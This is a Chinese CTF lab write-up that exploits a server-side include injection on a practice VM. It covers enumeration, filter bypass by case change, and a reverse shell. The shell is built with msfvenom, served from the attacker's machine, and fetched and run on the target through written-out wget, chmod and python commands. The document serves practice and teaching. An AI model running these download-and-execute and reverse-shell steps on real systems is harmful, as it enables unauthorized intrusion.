CTF练习:SQL注入之SSI漏洞

CTF练习:SQL注入之SSI漏洞


靶机地址:
链接: https://pan.baidu.com/s/1tKoRIRNhEJzcjGwpNwP-sA
提取码: emfn

环境准备

开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。
查看攻击机kali的IP,为172.19.75.143
CTF练习:SQL注入之SSI漏洞
查看靶机的IP,为172.19.75.112
CTF练习:SQL注入之SSI漏洞
CTF练习:SQL注入之SSI漏洞
ping一下,测试连通性,没问题,开始信息收集。
CTF练习:SQL注入之SSI漏洞

信息收集

探测靶场开放的端口信息与服务版本
CTF练习:SQL注入之SSI漏洞
使用dirb对开放的80端口进行进一步挖掘
CTF练习:SQL注入之SSI漏洞
打开robots链接,发现反爬目录/spukcab,打开这个目录链接,发现两个备份文件,可以下载下来研究。
CTF练习:SQL注入之SSI漏洞
CTF练习:SQL注入之SSI漏洞
接着回到终端打开/ssi目录链接,发现很多信息,估计存在ssi漏洞。
CTF练习:SQL注入之SSI漏洞
再接着回到终端打开/index目录链接,发现了它给出的漏洞利用代码,那我们去寻找注入点。
CTF练习:SQL注入之SSI漏洞
最后我们打开靶机80端口的主页面,往下拉发现注入点。
CTF练习:SQL注入之SSI漏洞
CTF练习:SQL注入之SSI漏洞
将之前找到的示例代码粘进去,submit,发现exec没有出现。
CTF练习:SQL注入之SSI漏洞
CTF练习:SQL注入之SSI漏洞
尝试修改大小写,试图绕过。
CTF练习:SQL注入之SSI漏洞
CTF练习:SQL注入之SSI漏洞
成功绕过,但是没执行,可能是格式有误,我们加一个!号。
CTF练习:SQL注入之SSI漏洞
CTF练习:SQL注入之SSI漏洞
终于成功了。

制作与上传shell

去到桌面,使用msfvenom制作shell.py。
CTF练习:SQL注入之SSI漏洞
将shell.py移到apache的主目录,即 /var/www/html 下。
CTF练习:SQL注入之SSI漏洞
开启Apache服务。
CTF练习:SQL注入之SSI漏洞
开启 metasploit 监听反弹 shell。
CTF练习:SQL注入之SSI漏洞
CTF练习:SQL注入之SSI漏洞
CTF练习:SQL注入之SSI漏洞
CTF练习:SQL注入之SSI漏洞
run,启动监听。
CTF练习:SQL注入之SSI漏洞
回到注入网页,下载shell.py文件。
wget http://172.19.75.143/shell.py
CTF练习:SQL注入之SSI漏洞
给shell.py赋权。
chmod 777 shell.py
CTF练习:SQL注入之SSI漏洞
执行shell.py文件,返回shell。
python shell.py
CTF练习:SQL注入之SSI漏洞
回到终端,可以看到shell已经返回回来了。
CTF练习:SQL注入之SSI漏洞

进入靶机

输入shell,进入终端。
CTF练习:SQL注入之SSI漏洞
优化终端。
CTF练习:SQL注入之SSI漏洞
这次靶机主要是相关的sql注入练习,并没有flag值,所以至此完工!!!